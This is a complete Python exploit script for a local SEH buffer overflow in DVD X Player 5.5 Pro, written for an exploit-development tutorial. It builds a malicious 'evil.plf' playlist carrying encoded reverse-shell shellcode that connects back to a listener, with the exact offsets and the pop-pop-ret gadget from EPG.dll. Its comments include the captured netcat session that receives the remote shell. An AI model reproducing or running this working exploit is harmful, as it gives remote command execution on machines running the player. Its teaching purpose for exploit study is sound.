#!/usr/bin/python -w
#----------------------------------------------------------------------------------#
# Exploit: DVD X Player 5.5 Pro SEH (local BOF) #
# OS: Tested XP PRO SP3 (EPG.dll should be universal) #
# Author: b33f (Ruben Boonen) #
# Software: http://www.exploit-db.com/wp-content/themes/exploit/applications #
# /cdfda7217304f4deb7d2e8feb5696394-DVDXPlayerSetup.exe #
#----------------------------------------------------------------------------------#
# This exploit was created for Part 3 of my Exploit Development tutorial series... #
# http://www.fuzzysecurity.com/tutorials/expDev/3.html #
#----------------------------------------------------------------------------------#
# root@bt:~# nc -lvp 9988 #
# listening on [any] 9988 ... #
# 192.168.111.128: inverse host lookup failed: Unknown server error #
# connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1044 #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# #
# G:\tutorial>ipconfig #
# ipconfig #
# #
# Windows IP Configuration #
# #
# #
# Ethernet adapter Local Area Connection: #
# #
# Connection-specific DNS Suffix . : localdomain #
# IP Address. . . . . . . . . . . . : 192.168.111.128 #
# Subnet Mask . . . . . . . . . . . : 255.255.255.0 #
# Default Gateway . . . . . . . . . : #
# #
# G:\tutorial> #
#----------------------------------------------------------------------------------#
filename="evil.plf"
#---------------------------------------------------------------------------------------------------------------#
# msfpayload windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9988 R| msfencode -b '\x00\x0A\x0D\x1A' -t c #
# [*] x86/shikata_ga_nai succeeded with size 341 (iteration=1) #
#---------------------------------------------------------------------------------------------------------------#
shellcode = (
"\xba\x6f\x3d\x04\x90\xd9\xc7\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x4f\x31\x56\x14\x83\xee\xfc\x03\x56\x10\x8d\xc8\xf8\x78\xd8"
"\x33\x01\x79\xba\xba\xe4\x48\xe8\xd9\x6d\xf8\x3c\xa9\x20\xf1"
"\xb7\xff\xd0\x82\xb5\xd7\xd7\x23\x73\x0e\xd9\xb4\xb2\x8e\xb5"
"\x77\xd5\x72\xc4\xab\x35\x4a\x07\xbe\x34\x8b\x7a\x31\x64\x44"
"\xf0\xe0\x98\xe1\x44\x39\x99\x25\xc3\x01\xe1\x40\x14\xf5\x5b"
"\x4a\x45\xa6\xd0\x04\x7d\xcc\xbe\xb4\x7c\x01\xdd\x89\x37\x2e"
"\x15\x79\xc6\xe6\x64\x82\xf8\xc6\x2a\xbd\x34\xcb\x33\xf9\xf3"
"\x34\x46\xf1\x07\xc8\x50\xc2\x7a\x16\xd5\xd7\xdd\xdd\x4d\x3c"
"\xdf\x32\x0b\xb7\xd3\xff\x58\x9f\xf7\xfe\x8d\xab\x0c\x8a\x30"
"\x7c\x85\xc8\x16\x58\xcd\x8b\x37\xf9\xab\x7a\x48\x19\x13\x22"
"\xec\x51\xb6\x37\x96\x3b\xdf\xf4\xa4\xc3\x1f\x93\xbf\xb0\x2d"
"\x3c\x6b\x5f\x1e\xb5\xb5\x98\x61\xec\x01\x36\x9c\x0f\x71\x1e"
"\x5b\x5b\x21\x08\x4a\xe4\xaa\xc8\x73\x31\x7c\x99\xdb\xea\x3c"
"\x49\x9c\x5a\xd4\x83\x13\x84\xc4\xab\xf9\xb3\xc3\x3c\xc2\x6c"
"\xa4\x38\xaa\x6e\x3a\x66\x2f\xe6\xdc\x02\x3f\xae\x77\xbb\xa6"
"\xeb\x03\x5a\x26\x26\x83\xff\xb5\xad\x53\x89\xa5\x79\x04\xde"
"\x18\x70\xc0\xf2\x03\x2a\xf6\x0e\xd5\x15\xb2\xd4\x26\x9b\x3b"
"\x98\x13\xbf\x2b\x64\x9b\xfb\x1f\x38\xca\x55\xc9\xfe\xa4\x17"
"\xa3\xa8\x1b\xfe\x23\x2c\x50\xc1\x35\x31\xbd\xb7\xd9\x80\x68"
"\x8e\xe6\x2d\xfd\x06\x9f\x53\x9d\xe9\x4a\xd0\xad\xa3\xd6\x71"
"\x26\x6a\x83\xc3\x2b\x8d\x7e\x07\x52\x0e\x8a\xf8\xa1\x0e\xff"
"\xfd\xee\x88\xec\x8f\x7f\x7d\x12\x23\x7f\x54")
#----------------------------------------------------------------------------------#
# (*) badchars = '\x00\x0A\x0D\x1A' #
# #
# offset to: (2) nseh 608-bytes, (1) seh 112-bytes #
# (2) nseh = '\xEB\x06' => jump short 6-bytes #
# (1) seh = 0x61617619 : pop esi # pop edi # ret | EPG.dll #
# (3) shellcode space = 1384-bytes #
#----------------------------------------------------------------------------------#
# SEH Exploit Structure: #
# \----------------> #
# [AAA..................AAA] [nseh] [seh] [BBB..................BBB] #
# \--------------------------------------> #
# <-------/ #
# (1) Initial EIP overwrite, SEH leads us back 4-bytes to nSEH #
# (2) nSEH jumps over SEH and redirects execution to our B's #
# (3) We place our shellcode here ... Game Over! #
#----------------------------------------------------------------------------------#
evil = "\x90"*20 + shellcode
buffer = "A"*608 + "\xEB\x06\x90\x90" + "\x19\x76\x61\x61" + evil + "B"*(1384-len(evil))
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
DVD X Player 5.5 Pro (*.plf BOF)
Created for part three of my exploit development tutorials covering "Structured Exception Handler".